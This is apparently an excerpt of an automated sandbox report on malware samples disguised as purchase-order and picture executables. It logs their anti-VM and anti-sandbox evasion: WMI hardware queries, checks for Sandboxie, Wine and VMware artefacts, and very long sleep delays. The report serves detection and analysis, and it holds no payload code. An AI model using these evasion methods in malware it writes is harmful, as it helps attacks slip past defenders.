Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3

Show sources

Source: Yara match	File source: 00000000.00000002.280603529.000000000369E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B6LNCKjOGt5EmFQ.exe PID: 6076, type: MEMORY

Found evasive API chain (trying to detect sleep duration tampering with parallel thread)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe

Function Chain: systemQueried,threadCreated,threadResumed,threadDelayed,threadDelayed,threadDelayed,systemQueried,systemQueried,systemQueried,threadDelayed,systemQueried,threadDelayed,threadDelayed,threadDelayed,threadAPCQueued,threadDelayed,threadDelayed,threadDelayed,threadDelayed,threadDelayed,memAlloc,memAlloc,memAlloc,memAlloc,threadDelayed

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: B6LNCKjOGt5EmFQ.exe, 00000000.00000002.282531714.0000000003AD7000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: GetAdaptersInfo,		10_2_04A22D72
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Code function: GetAdaptersInfo,		10_2_04A22D4A

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Thread delayed: delay time: 300000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Window / User API: threadDelayed 1362	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	Window / User API: threadDelayed 8011	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Window / User API: threadDelayed 3259
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	Window / User API: threadDelayed 6583
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	Window / User API: threadDelayed 586

Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe TID: 2588	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe TID: 2588	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B6LNCKjOGt5EmFQ.exe TID: 5916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99563s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -197656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -197438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97750s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -194062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96235s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99735s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97610s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97297s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -97156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe TID: 6916	Thread sleep time: -96688s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 6360	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 6708	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 6712	Thread sleep time: -140000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 6720	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 7144	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 3920	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 3920	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Pictures.exe TID: 3920	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe TID: 5616	Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe TID: 7048	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe TID: 7048	Thread sleep time: -3090000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe TID: 7048	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe TID: 7048	Thread sleep time: -39906s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe TID: 7048	Thread sleep time: -39876s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\LOGO AND PICTURES.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\Pictures.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO456724392021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\PO2345714382021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
